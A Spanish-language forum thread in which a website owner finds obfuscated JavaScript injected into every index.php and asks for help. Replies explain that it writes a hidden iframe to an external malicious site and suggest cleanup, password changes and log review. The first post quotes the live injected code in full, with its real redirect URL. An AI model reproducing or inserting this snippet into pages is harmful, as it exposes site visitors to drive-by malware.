Muy urgente y no es broma

Pues algunos usuarios de mi web decian queponia que este servidor puede dañar el ordenador, despues al ir al ftp me encontrado esto en cada index.php

<!-- o --><script>var lwa="<";var elg="i";var fqqjq=" ";var ciplw="ufebm='waZLSyhB' tvtbx='Fwcn7bA0' krcxm='AH3GIdbg' twnko='BA25NRUb' src=";var pzkly="ame>";var kimdl="/tds/go.php?sid=3&lucky";var vtnqi="?wDjQqTk ";var wzn="f";var pkc="r";var ymq="a";var rqdre="wjjyi='P9wpLXPG' dxcip='ajZFAHUy' dnria='bdY3F5Nu' egafm='fMswiX72' gyicy='i4DpByrB' cnbfx='q60biqDw' ";var azz="m";var ukp="e";var mntra="width=671 ";var oqnaf="http://llforyourpets.net";var dexlv="height=315 ";var ybnmr="style='display:none'";var ybooc=oqnaf+kimdl;var uydmn="></ifr";document.write(lwa+elg+wzn+pkc+ymq+azz+ukp+fq qjq+ciplw+ybooc+vtnqi+rqdre+mntra+dexlv+ybnmr+uydm n+pzkly);</script><!-- c -->

Que es
ayuda pr favor

Parece un codigo que te han inyectado.

Fijate la extension del archivo en que encontraste esto y luego revisa todos los archivos con la misma extension, ya que generalmente asi se instalan esos codigos.

Y si una vez que lo quitas de todos los archivos te vuelve a aparecer, estamos en problemas...

Hola Totolia
Cuando en las normas se pide poner títulos descriptivos y escapar de los "ayuda", "muy urgente" es por algún motivo.

Tiene toda la pinta de ser un código inyectado. ¿Vírus? por el aviso podría ser. Hay servidores gratuitos que también colocan su código en tu página.

Te tocará limpiar todo tus códigos y descubrir cuando te lo inyectan, si es en local al hacer tus páginas o si lo tienes en tu servidor.

Quizás te puedan brindar mejor ayuda en el foro de "virus".

Joder pues estoy cagao, es una web de pago, no es un server gratis, podria ser a causa de un keylogger

Si cambio la contraseÑa desde otra pc del ftp, etc, y lo limpio ya no pasaria verdad

creo que ya lo e solucionado, como estoy seguro de saberlo, e rebisado las pganias e cambiado la ftp, cp, etc. y loe limpiado, hay alguna manera de estar mas seguro. Lo he hecho desde el ipod asi que supongo k ya estara todo bien

Generalmente los exploits o inyecciones no se solucionan tan facilmente.

Pero ojala que no haya sido eso y se te solucione el problema.
Asegurate de limpiar "Todos" los archivos de tu web, asegurate de sacarlo por completo.

Saludos...

inyecciones. eso pasa de manera mas comun de lo que crees y en realidad se solucionan muy facil, solo ponte en contacto con tu proveedor de host y ellos entenderan el problema rapido
ya que esta en juego su reputacion, lo que haran sera cambiar tu cuenta a otro servidor (talvez con otra ip) y limpiar las cuentas. ojala y que ya lo ayas solucionado suerte!

lo que hace el código ese es escribir lo siguiente:
lanza un iframe oculto que apunta hacia una web infectada.

Hola

El que hayas solucionado el problema por ahora está muy bien, sin embargo, hay tres elementos que considerar aquí.

1. Tu seguridad es muy baja.
2. La seguridad de tu servidor web (de pago) es muy baja (esto es muy grave)
3. El título de este tema es totalmente inadecuado.

Así que deberás ponerte lo antes posible a remediar los problemas.

EL 1 ya lo empezaste a hacer, pero deberías también considerar opciones como modificar los permisos de acceso y escritura a los archivos, al menos para empezar. El segundo punto, debes comunicarte con tu servidor y decirles lo que ha pasado para que remedien sus fallos.

Felicidad

Lo suyo es ver la fecha de modificación de los ficheros, con esa informacion ir a los logs ftp y logs web y ver si la inyección es:

Por que tienen la clave de tu ftp y suben de nuevo el fichero "infectado"
O que a través de alguna vulnerabilidad de tu código o de tu servidor acceden al fichero y te lo modifican.

Suerte amigo.